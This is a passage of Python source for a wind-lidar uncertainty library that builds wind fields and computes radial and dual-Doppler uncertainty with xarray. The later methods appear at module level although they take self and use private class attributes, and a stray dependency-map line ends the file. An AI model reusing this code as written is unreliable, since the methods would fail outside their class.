            Wind components (eastward_wind, northward_wind,
            upward_air_velocity in cf convention), in m/s.
        wind_speed : ndarray
            Wind speed at the points, in m/s.
        wind_from_direction : ndarray
            Wind direction at the points, in degrees.

        Notes
        ----
        Only 'points' and 'horizontal_mesh' data structures are supported.
        Variable naming follows the cf convention.
        """
        positions = measurements['positions']
        category = measurements['category']
        # make special data structure for PPI scans
        if category == 'points':
            # One 'point' dimension; coordinates carry the point positions.
            self.wind_field = xr.Dataset({'eastward_wind':(['point'], u),
                                          'northward_wind':(['point'], v),
                                          'upward_air_velocity':(['point'], w),
                                          'wind_speed':(['point'], wind_speed),
                                          'wind_from_direction':(['point'], wind_from_direction)},
                                         coords={'Easting':(['point'], positions[:,0]),
                                                 'Northing':(['point'], positions[:,1]),
                                                 'Height_asl': (['point'], positions[:,2]),
                                                 'Height_agl': (['point'], positions[:,3])}
                                        )
        if category == 'horizontal_mesh':
            # Reshape the flat point arrays back into the (nrows, ncols) grid.
            nrows = measurements['nrows']
            ncols = measurements['ncols']
            self.wind_field = xr.Dataset({'eastward_wind':(['Northing', 'Easting'], u.reshape(nrows, ncols).T),
                                          'northward_wind':(['Northing', 'Easting'], v.reshape(nrows, ncols).T),
                                          'upward_air_velocity':(['Northing', 'Easting'], w.reshape(nrows, ncols).T),
                                          'wind_speed':(['Northing', 'Easting'], wind_speed.reshape(nrows, ncols).T),
                                          'wind_from_direction':(['Northing', 'Easting'], wind_from_direction.reshape(nrows, ncols).T)},
                                         coords={'Easting': np.unique(positions[:,0]),
                                                 'Northing': np.unique(positions[:,1]),
                                                 # heights are constant over a horizontal mesh,
                                                 # so a single representative value is stored
                                                 'Height_asl': positions[1,2],
                                                 'Height_agl': positions[1,3]}
                                        )
        self.wind_field.attrs['title'] = 'Wind characteristics at measurement points of interest'
        self.wind_field.attrs['convention'] = 'cf'
        self.wind_field.attrs['atmospheric_model'] = atmosphere['model']
        self.wind_field.attrs['atmospheric_model_parameters'] = atmosphere['model_parameters']
        self.wind_field.eastward_wind.attrs['units'] = 'm s-1'
        self.wind_field.northward_wind.attrs['units'] = 'm s-1'
        self.wind_field.upward_air_velocity.attrs['units'] = 'm s-1'
        self.wind_field.wind_speed.attrs['units'] = 'm s-1'
        self.wind_field.wind_from_direction.attrs['units'] = 'degree'
        self.wind_field.Easting.attrs['units'] = 'm'
        self.wind_field.Northing.attrs['units'] = 'm'
        self.wind_field.Height_asl.attrs['units'] = 'm'
        self.wind_field.Height_agl.attrs['units'] = 'm'
    def calculate_wind(self, measurements_id, atmosphere_id):
        """
        Calculates wind characteristics at the selected measurement points.

        Parameters
        ----------
        measurements_id : str, required
            String which identifies measurements instance in the dictionary.
        atmosphere_id : str, required
            String which identifies the atmosphere instance used to
            calculate the wind vector at the measurement points.
        """
        atmosphere = self.atmosphere[atmosphere_id]
        measurements = self.measurements[measurements_id]
        shear_exponent = atmosphere['model_parameters']['shear_exponent']
        reference_height = atmosphere['model_parameters']['reference_height']
        # Power-law scaling of the reference speed with height agl (column 3).
        gain = (measurements['positions'][:,3] / reference_height)**shear_exponent
        u = atmosphere['model_parameters']['eastward_wind'] * gain
        v = atmosphere['model_parameters']['northward_wind'] * gain
        w = np.full(gain.shape, atmosphere['model_parameters']['upward_air_velocity'])
        wind_speed = atmosphere['model_parameters']['wind_speed'] * gain
        wind_from_direction = np.full(gain.shape, atmosphere['model_parameters']['wind_from_direction'])
        self.__create_wind_ds(atmosphere, measurements,
                              u, v, w, wind_speed, wind_from_direction)
class Instruments:
    """Base class holding the instruments dictionary and shared helpers."""

    # Keys accepted by update_instrument (and by subclasses' add_* methods).
    __KWARGS = {'uncertainty_model',
                'u_estimation',
                'u_range',
                'u_azimuth',
                'u_elevation',
                'u_radial',
                'range_gain',
                'azimuth_gain',
                'elevation_gain',
                'atmosphere_id',
                'measurements_id',
                'probing_coordinates',
                'radial_velocity',
                'coordinate_system',
                'coordinates',
                'category',
                'linked_instruments' }

    def __init__(self):
        self.instruments = {}
        self.verbos = True

    @staticmethod
    def check_instrument_position(instrument_position):
        """Validate an instrument position.

        Parameters
        ----------
        instrument_position : ndarray
            1D numpy array [x, y, z] of the instrument, in meters.

        Returns
        -------
        True / False
        """
        if type(instrument_position).__module__ != np.__name__:
            # not a numpy array
            return False
        # must be a flat array of exactly three coordinates
        return (len(instrument_position.shape) == 1
                and instrument_position.shape[0] == 3)

    def update_instrument(self, instrument_id, **kwargs):
        """Update an instrument instance with the information in kwargs.

        Parameters
        ----------
        instrument_id : str, required
            Key of the instrument in the instruments dictionary.

        Other Parameters
        -----------------
        u_estimation : float, optional
            Uncertainty in estimating radial velocity from Doppler spectra.
        u_range : float, optional
            Uncertainty in detecting the probed range.
        u_azimuth : float, optional
            Beam-steering uncertainty for the azimuth angle.
        u_elevation : float, optional
            Beam-steering uncertainty for the elevation angle.

        Raises
        ------
        ValueError
            "WrongId" when instrument_id is unknown; "WrongKwargs" when a
            kwarg is not in the accepted key set.

        Notes
        -----
        Manually updating keys used by the uncertainty calculation does NOT
        re-trigger it; re-run calculate_uncertainty afterwards.

        TODO
        ----
        - If certain keys are changed/updated trigger the uncertainty re-calc.
        """
        if instrument_id not in self.instruments:
            raise ValueError("WrongId")
        if kwargs and not set(kwargs).issubset(self.__KWARGS):
            raise ValueError("WrongKwargs")
        # Only the intrinsic-uncertainty keys are written back here.
        intrinsic_keys = {'u_estimation', 'u_range', 'u_azimuth', 'u_elevation'}
        for key, value in kwargs.items():
            if key in intrinsic_keys:
                self.instruments[instrument_id]['intrinsic_uncertainty'][key] = value
class Lidars(Instruments):
    """
    A class containing methods and attributes related to wind lidars.
    Methods
    -------
    add_lidar(instrument_id, position, **kwargs):
        Adds a lidar instance to the instrument dictionary.
    """

    def __init__(self):
        super().__init__()

    def add_lidar(self, instrument_id, position, **kwargs):
        """
        Adds a lidar instance to the instrument dictionary.
        Parameters
        ----------
        instrument_id : str, required
            Key under which the lidar is stored in the instrument dictionary.
        position : ndarray, required
            nD array of Northing, Easting and Height coordinates of the
            instrument, expressed in meters (UTM).
        Other Parameters
        ----------------
        u_estimation, u_range, u_azimuth, u_elevation : float, optional
            Intrinsic uncertainties; defaults are 0.1 m/s, 1 m,
            0.1 deg and 0.1 deg respectively.
        Raises
        ------
        ValueError
            "InappropriatePosition" if the position is not properly formed.
        Notes
        -----
        Instruments are added one at a time; only positions in the UTM
        coordinate system are currently supported.
        """
        if not self.check_instrument_position(position):
            raise ValueError("InappropriatePosition")
        category = "wind_lidar"
        self.instruments[instrument_id] = {
            'category': category,
            'position': position,
            'intrinsic_uncertainty': {
                'u_estimation': 0.1,   # m/s, default
                'u_range': 1,          # m, default
                'u_azimuth': 0.1,      # deg, default
                'u_elevation': 0.1,    # deg, default
            },
        }
        # Apply any caller-supplied overrides of the intrinsic uncertainties.
        self.update_instrument(instrument_id, **kwargs)
        if self.verbos:  # NOTE(review): attribute spelled 'verbos' upstream -- confirm
            print('Instrument \'' + instrument_id + '\' of category \'' +
                  category + '\' added to the instrument dictionary, ' +
                  'which now contains ' + str(len(self.instruments)) +
                  ' instrument(s).')
class Uncertainty(Measurements, Lidars):
    """
    A class containing methods to calculate single- and dual- Doppler uncertainty.
    Methods
    -------
    add_atmosphere(atmosphere_id, model, model_parameters)
        Adds description of the atmosphere to the atmosphere dictionary.
    add_instrument(instrument_id, position, category, **kwargs):
        Adds an instrument to the instrument dictionary.
    add_measurements(measurements_id, category, **kwargs)
        Adds desired measurement positions to the measurements dictionary.
    calculate_uncertainty(instrument_ids, measurements_id, atmosphere_id, uncertainty_model)
        Calculates a measurement uncertainty for a given instrument(s).
    """
    def __init__(self):
        # Resulting xarray dataset; populated by calculate_uncertainty.
        self.uncertainty = None
        # NOTE(review): bases are initialised explicitly rather than via
        # super(); Lidars.__init__ itself is never invoked here -- confirm
        # this is intentional.
        Instruments.__init__(self)
        Measurements.__init__(self)
        # Public mapping instrument_id -> beam coordinates, filled by
        # _generate_prob_dict (calculate_uncertainty keeps its own
        # private, name-mangled copy).
        self.probing_dict = {}
def _generate_prob_dict(self, instrument_id, measurements_id):
    # Beam geometry from the instrument position to every measurement
    # point, stored under the instrument id.
    # NOTE(review): this writes the public `probing_dict`, while
    # calculate_uncertainty maintains a private `__probing_dict` --
    # confirm which one callers rely on.
    beam_coords = generate_beam_coords(
        self.instruments[instrument_id]['position'],
        self.measurements[measurements_id]['positions'])
    self.probing_dict.update({instrument_id: beam_coords})
def __create_rad_ds(self, instrument_id, measurements):
    """
    Creates radial wind speed uncertainty xarray object.
    Parameters
    ----------
    instrument_id : str
        String indicating the instrument in the dictionary to be considered.
    measurements : dict
        Dictionary containing information on measurements.
    Returns
    -------
    ds : xarray
        xarray dataset containing radial wind speed uncertainty.
        Returns None for an unsupported measurements category.
    Notes
    ----
    Currently this method only supports points and horizontal mesh data structures.
    The method can be called only when the radial uncertainty has been calculated.
    """
    positions = measurements['positions']
    category = measurements['category']
    intrinsic_uncertainty = self.instruments[instrument_id]['intrinsic_uncertainty']
    if category == 'points':
        # Private (name-mangled) state populated by calculate_uncertainty.
        prob_cord = self.__probing_dict[instrument_id]
        rad_speed = self.__radial_vel_dict[instrument_id]
        azimuth_gain = self.__radial_uncertainty[instrument_id]['azimuth_gain']
        elevation_gain = self.__radial_uncertainty[instrument_id]['elevation_gain']
        range_gain = self.__radial_uncertainty[instrument_id]['range_gain']
        u_radial = self.__radial_uncertainty[instrument_id]['u_radial']
        # Each variable gets a singleton 'instrument_id' dimension so that
        # per-instrument datasets can later be merged along it.
        ds = xr.Dataset({'azimuth':(['instrument_id','point'], np.array([prob_cord[:,0]])),
                         'elevation':(['instrument_id','point'], np.array([prob_cord[:,1]])),
                         'range':(['instrument_id','point'], np.array([prob_cord[:,2]])),
                         'radial_speed':(['instrument_id','point'], np.array([rad_speed])),
                         'azimuth_contribution':(['instrument_id','point'], np.array([azimuth_gain])),
                         'elevation_contribution':(['instrument_id','point'], np.array([elevation_gain])),
                         # NOTE(review): only range_gain is transposed here,
                         # unlike the other gains -- confirm intended.
                         'range_contribution':(['instrument_id','point'], np.array([range_gain.T])),
                         'radial_speed_uncertainty':(['instrument_id','point'], np.array([u_radial])),
                         # 'instrument_uncertainty':(['instrument_id'], np.array([intrinsic_uncertainty]))
                         },
                        coords={'Easting':(['point'], positions[:,0]),
                                'Northing':(['point'], positions[:,1]),
                                'Height': (['point'], positions[:,2]),
                                'instrument_id': np.array([instrument_id])}
                        )
        return ds
    if category == 'horizontal_mesh':
        nrows = measurements['nrows']
        ncols = measurements['ncols']
        # Flat per-point arrays reshaped back onto the (nrows, ncols) grid.
        prob_cord = self.__probing_dict[instrument_id].reshape(nrows, ncols,3)
        rad_speed = self.__radial_vel_dict[instrument_id].reshape(nrows, ncols)
        azimuth_gain = self.__radial_uncertainty[instrument_id]['azimuth_gain'].reshape(nrows, ncols)
        elevation_gain = self.__radial_uncertainty[instrument_id]['elevation_gain'].reshape(nrows, ncols)
        range_gain = self.__radial_uncertainty[instrument_id]['range_gain'].reshape(nrows, ncols)
        u_radial = self.__radial_uncertainty[instrument_id]['u_radial'].reshape(nrows, ncols)
        # Arrays are transposed so that the first grid axis maps to Northing.
        ds = xr.Dataset({'azimuth':(['instrument_id', 'Northing', 'Easting'],
                                    np.array([prob_cord[:,:, 0].T])),
                         'elevation':(['instrument_id', 'Northing', 'Easting'],
                                      np.array([prob_cord[:,:, 1].T])),
                         'range':(['instrument_id', 'Northing', 'Easting'],
                                  np.array([prob_cord[:,:, 2].T])),
                         'radial_speed':(['instrument_id', 'Northing', 'Easting'],
                                         np.array([rad_speed.T])),
                         'azimuth_contribution':(['instrument_id', 'Northing', 'Easting'],
                                                 np.array([azimuth_gain.T])),
                         'elevation_contribution':(['instrument_id', 'Northing', 'Easting'],
                                                   np.array([elevation_gain.T])),
                         'range_contribution':(['instrument_id', 'Northing', 'Easting'],
                                               np.array([range_gain.T])),
                         'radial_speed_uncertainty':(['instrument_id', 'Northing', 'Easting'],
                                                     np.array([u_radial.T])),
                         # NOTE(review): intrinsic_uncertainty is a dict; storing it
                         # as a dataset variable is unusual -- confirm it round-trips.
                         'intrinsic_uncertainty':(['instrument_id'], np.array([intrinsic_uncertainty]))
                         },
                        coords={'Easting': np.unique(positions[:,0]),
                                'Northing': np.unique(positions[:,1]),
                                'instrument_id': np.array([instrument_id]),
                                'Height': positions[0,2]}
                        )
        return ds
def __create_dd_ds(self, measurements):
    """
    Creates dual-Doppler uncertainty xarray object.
    Parameters
    ----------
    measurements : dict
        Dictionary containing information on measurements.
    Returns
    -------
    ds : xarray
        xarray dataset containing dual-Doppler uncertainty.
    Notes
    ----
    Currently this method only supports points and horizontal mesh data structures.
    The method can be called only when the dual-Doppler uncertainty has been calculated.
    """
    positions = measurements['positions']
    category = measurements['category']
    if category == 'points':
        # Private (name-mangled) results stored by the
        # __calculate_DD_*_uncertainty methods.
        ds = xr.Dataset({'wind_speed_uncertainty':(['point'],
                                                   self.__wind_speed_uncertainty),
                         'wind_from_direction_uncertainty':(['point'],
                                                            self.__wind_from_direction_uncertainty),
                         'between_beam_angle':(['point'], self.__between_beam_angle),
                         'numerator_of_wind_speed_uncertainty':(['point'], self.__numerator_Vh),
                         'numerator_of_wind_from_direction_uncertainty':(['point'], self.__numerator_dir),
                         'denominator_of_wind_speed_uncertainty':(['point'], self.__denominator_Vh),
                         'denominator_of_wind_from_direction_uncertainty':(['point'], self.__denominator_dir),
                         },
                        coords={'Easting':(['point'], positions[:,0]),
                                'Northing':(['point'], positions[:,1]),
                                'Height': (['point'], positions[:,2])}
                        )
    if category == 'horizontal_mesh':
        ds = xr.Dataset({'wind_speed_uncertainty':(['Northing', 'Easting'], self.__wind_speed_uncertainty),
                         'wind_from_direction_uncertainty':(['Northing', 'Easting'], self.__wind_from_direction_uncertainty),
                         'between_beam_angle':(['Northing', 'Easting'], self.__between_beam_angle),
                         'numerator_of_wind_speed_uncertainty':(['Northing', 'Easting'], self.__numerator_Vh),
                         'numerator_of_wind_from_direction_uncertainty':(['Northing', 'Easting'], self.__numerator_dir),
                         'denominator_of_wind_speed_uncertainty':(['Northing', 'Easting'], self.__denominator_Vh),
                         'denominator_of_wind_from_direction_uncertainty':(['Northing', 'Easting'], self.__denominator_dir),
                         },
                        coords={'Easting': np.unique(positions[:,0]),
                                'Northing': np.unique(positions[:,1]),
                                'Height': positions[0,2]})
    # NOTE(review): if category is neither 'points' nor 'horizontal_mesh',
    # `ds` is never bound and this return raises NameError -- confirm that
    # callers always pass a supported category.
    return ds
@staticmethod
def __update_metadata(ds, uncertainty_model):
    """
    Updates xarray dataset with metadata.
    Parameters
    ----------
    ds : xarray
        xarray dataset containing radial and/or dual-Doppler uncertainty.
    uncertainty_model : str
        String indicating which uncertainty model was used for the calculation.
    Returns
    -------
    ds : xarray
        The same dataset, updated in place with CF-style metadata.
    """
    ds.attrs['title'] = 'Radial speed uncertainty'
    ds.attrs['convention'] = 'cf'
    ds.attrs['uncertainty_model'] = 'Vasiljevic-Courtney_' + uncertainty_model
    # Angles in degrees, lengths in meters, velocities in m s-1.
    for field in ('azimuth', 'elevation'):
        getattr(ds, field).attrs['units'] = 'degree'
    ds.range.attrs['units'] = 'm'
    for field in ('radial_speed', 'radial_speed_uncertainty',
                  'azimuth_contribution', 'elevation_contribution',
                  'range_contribution'):
        getattr(ds, field).attrs['units'] = 'm s-1'
    ds.radial_speed.attrs['standard_name'] = 'radial_velocity_of_scatterers_toward_instrument'
    for field in ('Easting', 'Northing', 'Height'):
        getattr(ds, field).attrs['units'] = 'm'
    if uncertainty_model == 'dual-Doppler':
        ds.attrs['title'] = 'Dual-Doppler uncertainty'
        ds.attrs['uncertainty_model'] = 'Vasiljevic-Courtney_' + uncertainty_model
        ds.wind_from_direction_uncertainty.attrs['units'] = 'degree'
        ds.wind_speed_uncertainty.attrs['units'] = 'm s-1'
    return ds
def __calculate_elevation_contribution(self, instrument_id):
    """
    Calculates the elevation angle uncertainty contribution to the radial uncertainty.
    Parameters
    ----------
    instrument_id : str
        String indicating the instrument in the dictionary to be considered.
    Returns
    -------
    elevation_contribution : ndarray
        nD array of elevation angle uncertainty contribution for each measurement point.
    """
    # Necessary parameters extraction:
    #
    u_elevation = self.instruments[instrument_id]['intrinsic_uncertainty']['u_elevation']
    # coords columns appear to be [azimuth, elevation, range] per point,
    # as produced by generate_beam_coords -- TODO confirm.
    coords = self.__probing_dict[instrument_id]
    wind_from_direction = self.wind_field.wind_from_direction.values.reshape(-1)
    shear_exponent = self.wind_field.attrs['atmospheric_model_parameters']['shear_exponent']
    wind_speed = self.wind_field.attrs['atmospheric_model_parameters']['wind_speed']
    reference_height = self.wind_field.attrs['atmospheric_model_parameters']['reference_height']
    measurement_height = self.wind_field.Height_agl.values
    # Sensitivity of the radial velocity to the elevation angle for a
    # power-law ((h/h_ref)**alpha) wind profile: the first term accounts
    # for the shear-induced change of wind speed with probing height, the
    # second for the beam-projection geometry. The result is scaled by
    # u_elevation and converted deg -> rad (u_elevation is in degrees).
    elevation_contribution = (- shear_exponent * coords[:,2] *
                              np.cos(np.radians(coords[:,0] - wind_from_direction)) *
                              np.cos(np.radians(coords[:,1]))**2 *
                              (measurement_height / reference_height)**(shear_exponent-1) *
                              (wind_speed / reference_height) +
                              np.cos(np.radians(coords[:,0] - wind_from_direction)) *
                              np.sin(np.radians(coords[:,1])) *
                              wind_speed*(measurement_height / reference_height)**(shear_exponent)
                              ) * u_elevation * (pi/180)
    return elevation_contribution
def __calculate_azimuth_contribution(self, instrument_id):
    """
    Calculates the azimuth angle uncertainty contribution to the radial uncertainty.
    Parameters
    ----------
    instrument_id : str
        String indicating the instrument in the dictionary to be considered.
    Returns
    -------
    azimuth_contribution : ndarray
        nD array of azimuth angle uncertainty contribution for each measurement point.
    """
    # Necessary parameters extraction:
    #
    u_azimuth = self.instruments[instrument_id]['intrinsic_uncertainty']['u_azimuth']
    # coords columns appear to be [azimuth, elevation, range] -- TODO confirm.
    coords = self.__probing_dict[instrument_id]
    wind_from_direction = self.wind_field.wind_from_direction.values.reshape(-1)
    shear_exponent = self.wind_field.attrs['atmospheric_model_parameters']['shear_exponent']
    wind_speed = self.wind_field.attrs['atmospheric_model_parameters']['wind_speed']
    reference_height = self.wind_field.attrs['atmospheric_model_parameters']['reference_height']
    measurement_height = self.wind_field.Height_agl.values
    # Sensitivity of the radial velocity to the azimuth angle for a
    # power-law wind profile, scaled by u_azimuth and converted
    # deg -> rad (u_azimuth is expressed in degrees).
    azimuth_contribution = - (np.sin(np.radians(coords[:,0] - wind_from_direction)) *
                              np.cos(np.radians(coords[:,1])) *
                              wind_speed*(measurement_height / reference_height)**(shear_exponent)) * u_azimuth * (pi/180)
    return azimuth_contribution
def __calculate_range_contribution(self, instrument_id):
    """
    Calculates the range uncertainty contribution to the radial uncertainty.
    Parameters
    ----------
    instrument_id : str
        String indicating the instrument in the dictionary to be considered.
    Returns
    -------
    range_contribution : ndarray
        nD array of range uncertainty contribution for each measurement point.
    """
    # Necessary parameters extraction:
    #
    u_range = self.instruments[instrument_id]['intrinsic_uncertainty']['u_range']
    # coords columns appear to be [azimuth, elevation, range] -- TODO confirm.
    coords = self.__probing_dict[instrument_id]
    wind_from_direction = self.wind_field.wind_from_direction.values.reshape(-1)
    shear_exponent = self.wind_field.attrs['atmospheric_model_parameters']['shear_exponent']
    wind_speed = self.wind_field.attrs['atmospheric_model_parameters']['wind_speed']
    reference_height = self.wind_field.attrs['atmospheric_model_parameters']['reference_height']
    measurement_height = self.wind_field.Height_agl.values
    # Sensitivity of the radial velocity to the probing range: a longer
    # range changes the probing height and hence, through the power-law
    # shear, the sampled wind speed. Scaled by u_range (meters).
    range_contribution = (
        (shear_exponent/reference_height) *
        np.cos(np.radians(coords[:,0] - wind_from_direction)) *
        np.cos(np.radians(coords[:,1])) *
        np.sin(np.radians(coords[:,1])) *
        wind_speed*(measurement_height / reference_height)**(-1 + shear_exponent)
        )*u_range
    return range_contribution
def __calculate_radial_uncertainty(self, instrument_id):
    """
    Calculates the radial wind speed uncertainty.
    Parameters
    ----------
    instrument_id : str
        String indicating the instrument in the dictionary to be considered.
    Returns
    -------
    dict_out : dict
        Dictionary with the selected uncertainty model, the combined
        radial uncertainty and the gain of each uncertainty component.
    Notes
    -----
    The radial wind speed uncertainty is the root-sum-square of the
    estimation uncertainty and the azimuth, elevation and range
    contributions (GUM-style combination of independent terms).
    """
    u_estimation = self.instruments[instrument_id]['intrinsic_uncertainty']['u_estimation']
    gain_azimuth = self.__calculate_azimuth_contribution(instrument_id)
    gain_elevation = self.__calculate_elevation_contribution(instrument_id)
    gain_range = self.__calculate_range_contribution(instrument_id)
    combined = np.sqrt(
        (u_estimation)**2 +
        (gain_azimuth)**2 +
        (gain_elevation)**2 +
        (gain_range)**2
        )
    return {
        'azimuth_gain': gain_azimuth,
        'elevation_gain': gain_elevation,
        'range_gain': gain_range,
        'u_radial': combined,
        'uncertainty_model': 'radial_velocity',
    }
def __calculate_DD_speed_uncertainty(self, instrument_ids):
    """
    Calculates the dual-Doppler wind speed uncertainty.
    Parameters
    ----------
    instrument_ids : list of str
        Ids of the two instruments forming the dual-Doppler pair.
    Notes
    --------
    Nothing is returned; the result and its numerator/denominator and the
    between-beam angle are stored in private attributes, later packaged
    by __create_dd_ds.
    The dual-Doppler wind speed uncertainty, :math:`{u_{V_{h}}}`, is calculated
    using the following mathematical expression:
    .. math::
        u_{V_{h}}=\\frac{1}{V_{h} \sin({\\theta}_{1}-{\\theta}_{2})^2} *
        \\biggl((V_{radial_{1}}-V_{radial_{2}}\cos({\\theta}_{1}-{\\theta}_{2}))^{2}u_{V_{radial_{1}}}^{2} +
        (V_{radial_{2}}-V_{radial_{1}}\cos({\\theta}_{1}-{\\theta}_{2}))^{2}u_{V_{radial_{2}}}^{2}\\biggl)^{\\frac{1}{2}}
    where :math:`u_{V_{radial_{1}}}` and :math:`u_{V_{radial_{2}}}` are radial
    uncertainties for measurements of radial velocities :math:`{V_{radial_{1}}}`
    and :math:`{V_{radial_{2}}}` by a dual-Doppler system (e.g., two lidars),
    :math:`{\\theta_{1}}` and :math:`{\\theta_{2}}` are the azimuth angles
    of the two intersecting beams at a point of interest, while :math:`{V_{h}}`
    is the horizontal wind speed at that point.
    """
    # Per-instrument slices of the already-computed radial uncertainty dataset.
    azimuth_1 = self.uncertainty.azimuth.sel(instrument_id =instrument_ids[0]).values
    azimuth_2 = self.uncertainty.azimuth.sel(instrument_id =instrument_ids[1]).values
    angle_dif = np.radians(azimuth_1 - azimuth_2) # in radians
    los_1 = self.uncertainty.radial_speed.sel(instrument_id=instrument_ids[0]).values
    U_rad1 = self.uncertainty.radial_speed_uncertainty.sel(instrument_id =instrument_ids[0]).values
    los_2 = self.uncertainty.radial_speed.sel(instrument_id =instrument_ids[1]).values
    U_rad2 = self.uncertainty.radial_speed_uncertainty.sel(instrument_id =instrument_ids[1]).values
    wind_speed = self.wind_field.wind_speed.values
    # Numerator and denominator kept separately so they can be inspected
    # in the output dataset.
    numerator = np.sqrt(((los_1 - los_2*np.cos(angle_dif))**2)*U_rad1**2+
                        ((los_2 - los_1*np.cos(angle_dif))**2)*U_rad2**2)
    denominator = wind_speed * (np.sin(angle_dif))**2
    uncertainty = numerator / denominator
    self.__numerator_Vh = numerator
    self.__denominator_Vh = denominator
    self.__wind_speed_uncertainty = uncertainty
    # arcsin(|sin|) folds the between-beam angle into [0, 90] degrees.
    self.__between_beam_angle = np.degrees(np.arcsin(np.abs(np.sin(angle_dif))))
def __calculate_DD_direction_uncertainty(self, instrument_ids):
    """
    Calculates the dual-Doppler wind direction uncertainty.
    Parameters
    ----------
    instrument_ids : list of str
        Ids of the two instruments forming the dual-Doppler pair.
    Returns
    -------
    None
        The uncertainty (in degrees) and its numerator/denominator are
        stored in private attributes, later packaged by __create_dd_ds.
    Notes
    --------
    The dual-Doppler wind direction uncertainty, :math:`{u_{\Theta}}`, is calculated
    using the following mathematical expression:
    .. math::
        u_{\Theta}=\\biggl(\\frac{u_{V_{radial_{1}}}^{2}V_{radial_{2}}^{2}+u_{V_{radial_{2}}}^{2}V_{radial_{1}}^{2}}{V_{h}^{4}\sin ({\\theta}_{1}-{\\theta}_{2})^{2}}\\biggl)^{\\frac{1}{2}}
    where :math:`u_{V_{radial_{1}}}` and :math:`u_{V_{radial_{2}}}` are radial
    uncertainties for measurements of radial velocities :math:`{V_{radial_{1}}}`
    and :math:`{V_{radial_{2}}}` by a dual-Doppler system (e.g., two lidars),
    :math:`{\\theta_{1}}` and :math:`{\\theta_{2}}` are the azimuth angles
    of the two intersecting beams at a point of interest, while :math:`{V_{h}}`
    is the horizontal wind speed at that point.
    """
    # Per-instrument slices of the already-computed radial uncertainty dataset.
    azimuth_1 = self.uncertainty.azimuth.sel(instrument_id =instrument_ids[0]).values
    azimuth_2 = self.uncertainty.azimuth.sel(instrument_id =instrument_ids[1]).values
    angle_dif = np.radians(azimuth_1 - azimuth_2) # in radians
    los_1 = self.uncertainty.radial_speed.sel(instrument_id =instrument_ids[0]).values
    U_rad1 = self.uncertainty.radial_speed_uncertainty.sel(instrument_id =instrument_ids[0]).values
    los_2 = self.uncertainty.radial_speed.sel(instrument_id =instrument_ids[1]).values
    U_rad2 = self.uncertainty.radial_speed_uncertainty.sel(instrument_id =instrument_ids[1]).values
    wind_speed = self.wind_field.wind_speed.values
    numerator = np.sqrt((los_1*U_rad2)**2 + (los_2*U_rad1)**2)
    denominator = np.abs(np.sin(angle_dif)) * wind_speed**2
    # Converted rad -> deg so the stored uncertainty is in degrees.
    uncertainty = (numerator / denominator)*(180/pi)
    self.__wind_from_direction_uncertainty = uncertainty
    self.__numerator_dir = numerator
    self.__denominator_dir = denominator
def calculate_uncertainty(self, instrument_ids,
                          measurements_id,
                          atmosphere_id,
                          uncertainty_model = 'radial_uncertainty'):
    """
    Calculates a measurement uncertainty for a given instrument(s).
    Parameters
    ----------
    instrument_ids : list, required
        List of strings which identifies instruments in the dictionary.
    measurements_id : str, required
        String corresponding to the key in measurements dictionary.
    atmosphere_id : str, required
        String corresponding to the key in atmosphere dictionary.
    uncertainty_model : str, optional
        String defining uncertainty model used for uncertainty calculations.
        default value set to 'radial_uncertainty'
    Raises
    ------
    ValueError
        If any id has the wrong type or is missing from its dictionary,
        if the measurement dictionary is empty for the given id, or if
        'dual-Doppler' is requested without exactly two instruments.
    Notes
    -----
    Currently, this method calculates radial and dual-Doppler
    uncertainty for single (radial uncertainty) or a pair of instruments
    (radial + dual-Doppler uncertainty). Results are stored in
    self.uncertainty as an xarray dataset.
    The radial wind speed uncertainty, :math:`{u_{V_{radial}}}`, is the
    root-sum-square of the estimation uncertainty and the elevation,
    azimuth and range contributions. The dual-Doppler wind speed and
    wind direction uncertainties follow the Vasiljevic-Courtney
    formulation; see __calculate_DD_speed_uncertainty and
    __calculate_DD_direction_uncertainty for the full expressions.
    """
    # --- input validation -------------------------------------------------
    if not isinstance(instrument_ids, list):
        raise ValueError('Instrument ids not provided as a list of strings!')
    if not all(isinstance(instrument_id, str) for instrument_id in instrument_ids):
        raise ValueError('One or more items in instrument id list not strings!')
    if not set(instrument_ids).issubset(set(self.instruments)):
        raise ValueError('One or more ids don\'t exist in the instrument dictionary!')
    if not isinstance(measurements_id, str):
        raise ValueError('measurements_id is not a string!')
    if measurements_id not in set(self.measurements):
        raise ValueError('Measurements id does not exist in the measurement dictionary!')
    if len(self.measurements[measurements_id]['positions']) == 0:
        raise ValueError('Measurements dictionary empty for the given id!')
    if not isinstance(atmosphere_id, str):
        raise ValueError('atmosphere_id is not a string!')
    if atmosphere_id not in set(self.atmosphere):
        raise ValueError('atmosphere_id does not exist in self.atmosphere!')
    # --- wind field over the measurement points ---------------------------
    measurements = self.measurements[measurements_id]
    self.calculate_wind(measurements_id, atmosphere_id)
    # --- probing geometry (azimuth, elevation, range) per instrument ------
    self.__probing_dict = {}
    for instrument_id in instrument_ids:
        coords = generate_beam_coords(self.instruments[instrument_id]['position'],
                                      measurements['positions'])
        self.__probing_dict.update({instrument_id: coords})
    # --- radial (line-of-sight) velocities per instrument -----------------
    self.__radial_vel_dict = {}
    for instrument_id in instrument_ids:
        los = wind_vector_to_los(self.wind_field.eastward_wind.values.reshape(-1),
                                 self.wind_field.northward_wind.values.reshape(-1),
                                 self.wind_field.upward_air_velocity.values.reshape(-1),
                                 self.__probing_dict[instrument_id][:,0],
                                 self.__probing_dict[instrument_id][:,1])
        self.__radial_vel_dict.update({instrument_id: los})
    # Expose the private state for external inspection.
    self.radial_vel_dict = self.__radial_vel_dict
    self.probing_dict = self.__probing_dict
    # --- radial velocity uncertainty per instrument -----------------------
    self.__radial_uncertainty = {}
    for instrument_id in instrument_ids:
        self.__radial_uncertainty.update(
            {instrument_id: self.__calculate_radial_uncertainty(instrument_id)})
    # --- assemble the per-instrument datasets into one --------------------
    for i, instrument_id in enumerate(instrument_ids):
        ds_temp = self.__create_rad_ds(instrument_id, measurements)
        if i == 0:
            self.uncertainty = ds_temp
        else:
            self.uncertainty = xr.merge([self.uncertainty, ds_temp])
    self.uncertainty = self.__update_metadata(self.uncertainty, 'radial_uncertainty')
    if uncertainty_model == 'dual-Doppler':
        if len(instrument_ids) != 2:
            raise ValueError('instrument_ids must contain exactly two ids!')
        self.__calculate_DD_speed_uncertainty(instrument_ids)
        self.__calculate_DD_direction_uncertainty(instrument_ids)
        ds_temp = self.__create_dd_ds(measurements)
        self.uncertainty = xr.merge([self.uncertainty, ds_temp])
        self.uncertainty = self.__update_metadata(self.uncertainty, 'dual-Doppler')
| {"/yaddum/__init__.py": ["/yaddum/yaddum.py"], "/test/test.py": ["/yaddum/__init__.py"]} |
